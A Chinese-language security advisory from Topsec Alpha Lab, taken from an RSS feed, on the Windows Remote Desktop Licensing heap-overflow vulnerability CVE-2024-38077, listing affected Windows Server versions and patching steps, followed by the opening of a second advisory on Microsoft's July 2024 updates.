<p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012758" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">8月9日，天融信阿尔法实验室监测到被命名为“狂躁许可（MadLicense）”的远程桌面许可服务远程代码执行漏洞（CVE-2024-38077）的部分漏洞细节及PoC伪代码在互联网上公开，微软已在2024年7月月度更新中发布此漏洞的补丁。</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">此漏洞影响Windows Server 2000到Windows Server 2025所有版本，已存在近30年。远程攻击者可以通过网络稳定利用此漏洞进行远控、勒索、蠕虫等攻击，且利用此漏洞无需任何权限即可实现远程代码执行。</span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">远程桌面许可服务（Remote Desktop Licensing，RDL）是Windows Server的一个组件，用于管理和颁发远程桌面服务的许可证，确保对远程应用程序和桌面进行安全且合规的访问。该服务被广泛部署于开启了Windows远程桌面服务（3389端口）的服务器上。RDL服务不是默认安装，但很多管理员会手动开启。</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows Server RDL服务中的一个堆溢出漏洞（CWE-122），由于在解码用户输入的许可密钥包时，未正确检验解码后数据长度与缓冲区大小之间的关系，导致堆溢出。未经授权的远程攻击者通过向存在漏洞的Windows Server发送特制的数据包来利用此漏洞，成功利用此漏洞可在该目标服务器上执行任意代码。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"> 目前，该漏洞的部分细节以及PoC伪代码已公开，但需要进行分析漏洞成因后，修改该PoC伪代码，才能真正复现该漏洞。</span></section><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x02 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞编号</span></strong></span></strong></span><br/></section><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.034em;color: black;font-size: 14px;">CVE-2024-38077</span><span lang="EN-US" style="letter-spacing: 0.034em;font-size: 14pt;color: black;"><o:p></o:p></span><br/></p><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x03 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞等级</span></strong></span></strong></span><br/></section><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">严重</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">Windows Server 2012 R2 (Server Core installation)</span></p><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2012 R2</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2012 (Server Core installation)</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2012</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2008 R2 for x64-based Systems Service Pack 1</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2008 for x64-based Systems Service Pack 2</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2008 for 32-bit Systems Service Pack 2</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2016 (Server Core installation)</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2016</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2019 (Server Core installation)</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2019</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2022 (Server Core installation)</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2022</span></section><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows Server 2022, 23H2 Edition (Server Core installation)</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x05 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><strong style="text-indent: 0em;font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-size: 16px;">Windows自动更新</span></strong><br/></section></li></ul><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-indent: 0em;text-wrap: wrap;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="margin-bottom: 0px;letter-spacing: 0.578px;text-indent: 0em;text-wrap: wrap;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="margin-bottom: 0px;letter-spacing: 0.578px;text-indent: 0em;text-wrap: wrap;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="margin-bottom: 0px;letter-spacing: 0.578px;text-indent: 0em;text-wrap: wrap;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="margin-bottom: 0px;letter-spacing: 0.578px;text-indent: 0em;text-wrap: wrap;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;text-wrap: wrap;list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><strong><span style="font-size: 14px;"></span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的7月补丁并安装：</span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></section><section style="letter-spacing: 0.578px;text-indent: 0em;text-wrap: wrap;line-height: 1.6em;"><span style="font-size: 14px;letter-spacing: 0.578px;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul</a></span></section><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">0x06 参考链接</span></strong><br/></section><h2 style="text-wrap: wrap;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;break-after: auto;background-color: rgb(255, 255, 255);"></h2><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077" target="_blank">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077</a></span><br/></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x07 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。</span></p><section style="margin-bottom: 0px;text-wrap: wrap;"><section style="margin-top: 30px;margin-bottom: 10px;"><section style="padding: 10px;display: inline-block;width: 578px;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。<br/></span></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="margin-top: 30px;margin-bottom: 10px;text-align: center;"><section style="padding: 5px;display: inline-block;width: 549.094px;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;"><section powered-by="xiumi.us"><section style="margin-top: -20px;margin-bottom: 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin-top: -20px;margin-bottom: 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin-top: -20px;margin-bottom: 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-imgfileid="100012992" data-ratio="0.06041666666666667" style="vertical-align: middle;width: auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="padding-left: 10px;display: inline-block;vertical-align: middle;width: 204.844px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><br/></section><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-imgfileid="100012993" data-ratio="1" style="vertical-align: middle;width: auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 333.156px;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;font-size: 14px;">天融信</span></p><p><span style="font-family: Optima-Regular, PingFangTC-light;font-size: 14px;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="padding: 5px;display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="padding-right: 8px;padding-left: 8px;text-align: left;color: rgb(131, 129, 129);font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;font-size: 14px;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496654">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9400d06b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496654%26idx%3D1%26sn%3Dc5c34d08fc0854fbc917b591cdaf263c%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 09 Aug 2024 13:29:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年7月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496650&amp;idx=1&amp;sn=3178a0172b6a8b78b1442119141488c8</link>
      <description>2024年7月10日，天融信阿尔法实验室监测到微软官方发布了7月安全更新。此次更新共修复138个漏洞（不包含4个外部分配漏洞），其中5个严重漏洞、132个重要漏洞、1个中危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-07-10 15:15</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年7月10日，天融信阿尔法实验室监测到微软官方发布了7月安全更新。此次更新共修复138个漏洞（不包含4个外部分配漏洞），其中5个严重漏洞、132个重要漏洞、1个中危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年7月10日，天融信阿尔法实验室监测到微软官方发布了7月安全更新。此次更新共修复138个漏洞（不包含4个外部分配漏洞），其中5个严重漏洞(Critical)、132个重要漏洞(Important)、1个中危漏洞(Moderate)。其中权限提升漏洞24个、远程代码执行漏洞59个、信息泄露漏洞8个、拒绝服务漏洞17个、欺骗漏洞6个、安全功能绕过漏洞24个。</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">本次微软安全更新涉及组件包括：Windows Hyper-V、Windows MSHTML Platform、Microsoft Office、Microsoft Office SharePoint、Microsoft Streaming Service、Windows Win32K、Microsoft Windows Codecs Library、Microsoft Graphics Component、Windows Remote Desktop Licensing Service、Windows COM Session、SQL Server、Windows Secure Boot等多个产品和组件。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 